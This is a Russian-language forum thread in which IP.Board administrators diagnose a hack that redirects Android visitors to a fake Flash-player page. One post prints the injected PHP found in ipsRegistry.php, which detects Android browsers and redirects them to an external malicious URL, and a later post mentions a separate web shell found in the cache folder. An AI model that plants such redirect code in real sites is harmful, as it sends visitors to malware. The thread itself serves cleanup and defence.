Jump to content

Вредносной код на сайте / перекидывает ну чужой сайт

Featured Replies

comment_16205
/admin/ 0755
/cache/ 0777
/cache/lang_cache 0777
/cache/lang_cache/1/ 0777
/cache/skin_cache/ 0777
/cache/tmp/ 0777
/converge_local/ 0755
/hooks/ 0777
/interface/ 0755
/ips_kernel/ 0755
/lofiversion/ 0755
/public/style_images/ 0777
/public/style_css/ 0777
uploads 0777
conf_global.php 0777
 
Для начала нужно выяснить куда перекидывает.
comment_16209

Никуда не перекидывает, и слава Богу. Я хотел сделать это в качестве профилактики. Однако, на всех папках у меня установлено 755, а на всех файлах 644. При этом всё прекрасно работает. Может, стоит именно до такой степени перекрывать доступ?

comment_16273

Папка cache чистая? Файлов с подозрительным названием не замечено?

comment_16554

и парни говорят что проблема толко у тех, у кого телефон на andorid, у других вроде все ок

comment_16555

Вот полная ссылка вируса куда перекидывает www.kirkdavidson.com/js/fp.html

Вот тут ребята тоже разбирались, походу у них сидит, но так и не разобрались: тынц

  • 2 недели спустя...
comment_16744

Народ? ну помогите у меня никто с андройда зайти на сайт не может, перекидывает на сайт что описано выше и просит установить флеш плеер.

comment_16749

По вирусчекеру ничего не обнаружено. 

Если везде искал, могу посоветовать лишь слить базу и искать по названию сайта, если не поможет - сливать все файлы форума и искать уже по ним.

comment_16870

Folder Find Text

 

Скачал сайт на комп, ввел поиск и нашел этот код в папке big-benz.ru/admin/sources/base/ipsRegistry.php

 

Содержание в самом низу файла такое:

$mbrowser = mobile_device_detect();
$is_session_alive = isset($_COOKIE['is_session_alive']) ? intval($_COOKIE['is_session_alive']) : 0;
if ($mbrowser != false && $mbrowser[1] == 'Android' && $is_session_alive < 3) {
    setcookie("is_session_alive", ++$is_session_alive, time() + 3600 * 24 * 1, "/");
    header("Location: __www.kirkdavidson.com/js/fp.html");
    exit;
}
comment_16871

Ну вот, а ты панику бил :) 

Замени этот файл оригинальным с той же версии IP.Board

comment_17081

После того как заменил на форуме вылезла ошибка

Fatal error: Cannot redeclare mobile_device_detect() (previously declared in /home/bigbenz/data/www/big-benz.ru/admin/sources/base/ipsController.php:480) in /home/bigbenz/data/www/big-benz.ru/cache/skin_cache/cacheid_26/skin_global.php on line 2100

 

пришлось возвращать старый файл

comment_17082

Замените этот файл, затем admin/sources/base/ipsController.php, затем перестройте кэш стилей.

comment_17083

Столкнулся с аналогичной проблемой сегодня, тоже редирект на киркдавдисона... Тот же самый файл... закоментил код, посмотрим, что будет.

Узнать бы как себя обезопасить от подобных вставок кода в файлы форума... Есть соображения?

comment_17084

Использовать последние версии форума и устанавливать актуальные патчи безопасности.

comment_17085


Использовать последние версии форума и устанавливать актуальные патчи безопасности.

Ну, патчи ставим по мере поступления, тут уже даже не от меня зависит. Их поступление должен отслеживать человек, ответственный за форумы (в данном случае это не совсем я=) ), поэтому не всё удаётся сделать своевременно. Зато потом приходится оперативно искать баги, "ковырякаться" =).

А в целом идея с последними версиями и патчами - само самой разумеется.

Народную медицину в виде скриптов-самописок не приветствуете?

comment_17094


Народную медицину в виде скриптов-самописок не приветствуете?

От этой народной медицины может стать и ещё хуже, так что не советую как раз ничего делать этим путём.

  • 3 недели спустя...
comment_18895

Забавная вещь вышла. Опять появился редирект... Тот же на давидсона и там же. Исправил, пошёл ковырять, чтобы что-нибудь найти. Наткнулся на понял, что делал почти аналогичные действия с теми же самыми файлами-картинками и никак не мог найти ответа в интернете, собственно в то же время и зарегистрировался тут, чтобы попытаться найти ответы, но увы и ах (ну что и не удивительно, ведь статья вышла позже). В итоге зачитал ещё что спасибо отдельное), полез в cashe и отрыл там ещё один вирь(к слову не sh.php, а просто абракадабра.php), который был незамедлительно удалён...

Жду новых поступлений...

comment_19150

Патчи безопасности необходимо было ставить.

Если вы уже установили все патчи безопасности — все в порядке.

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.


Guest
Ответить в этой теме...

Последние посетители 0

  • No registered users viewing this page.